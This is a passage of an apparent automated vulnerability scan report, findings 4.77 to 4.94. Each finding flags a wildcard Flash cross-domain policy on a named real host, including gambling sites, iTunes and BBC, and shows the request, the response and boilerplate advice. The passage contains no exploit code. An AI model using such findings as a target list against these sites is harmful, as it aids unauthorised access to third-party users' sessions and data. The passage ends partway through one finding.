Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3rgvylfgcgicwtbximbgvl45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.77. http://home.okscratchcards.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: home.okscratchcards.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:41:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ffsprm55njafadazbj5sveqa; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.78. http://hu.crazyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://hu.crazyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: hu.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 21 Sep 2010 08:44:53 GMT
Accept-Ranges: bytes
ETag: "82c9a426959cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:45:18 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="crazyscratch.com" />
   <allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.79. http://it.bigmoneyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.bigmoneyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: it.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=efks0b45scz4pi55n11whhar; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.80. http://it.crazyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.crazyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: it.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 08:48:14 GMT
Accept-Ranges: bytes
ETag: "d01ceff047b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:32:28 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="crazyscratch.com" />
   <allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.81. http://it.karamba.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.karamba.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: it.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ts1or4aaps5c1ibwbsgln3nm; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.82. http://it.scratch2cash.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.scratch2cash.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: it.scratch2cash.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=q4szys55tw2dkuro2bfsbg55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.83. http://it.scratchcardheaven.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.scratchcardheaven.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: it.scratchcardheaven.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:58:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=okdvct551gkpjx3alhysrrr4; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.84. http://itunes.apple.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: itunes.apple.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 12 May 2011 14:44:41 GMT
ETag: "1b0-4a3153aae8840"
Accept-Ranges: bytes
Content-Length: 432
Content-Type: text/xml
Cache-Control: public, no-transform, max-age=1968
Date: Mon, 16 May 2011 12:13:11 GMT
Connection: close
X-Apple-Partner: origin.0

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*.apple.com" />
<allow-access-from domain="*.apple.com.edgesuite.net" />
<allow-access-from domain="nikeplus.nike.com"/>
<allow-access-from domain="nikerunning.nike.com"/>
...[SNIP]...

4.85. http://karamba.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://karamba.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=s1w0tgvqrm11duv13rq3kkfa; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.86. http://mundirasca.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mundirasca.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mundirasca.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:20:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=oglzco2iopgob1555lrukhyl; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.87. http://nettiarpa.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nettiarpa.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: nettiarpa.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:48:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2qft2xvzsfsf5bbkas1hpw45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.88. http://newsrss.bbc.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Mon, 16 May 2011 12:47:27 GMT
Date: Mon, 16 May 2011 12:45:27 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.89. http://nl.bigmoneyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nl.bigmoneyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: nl.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=echhxy455as15jvyjhurua55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.90. http://nl.crazyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nl.crazyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: nl.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 08:48:23 GMT
Accept-Ranges: bytes
ETag: "101c0f647b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:35:17 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="crazyscratch.com" />
   <allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.91. http://nl.karamba.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nl.karamba.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: nl.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=odb4ujr02radec55eeiyz4uo; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.92. http://nl.scratch2cash.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nl.scratch2cash.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: nl.scratch2cash.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:09:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=auin4x55f0lulo45nbfwoh45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.93. http://nl.scratchcardheaven.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nl.scratchcardheaven.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: nl.scratchcardheaven.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:13:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wueoo2qw0ihwfj45hqb2ab55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.94. http://no.bigmoneyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://no.bigmoneyscratch.com
Path:   /crossdomain.xml

Issue detail

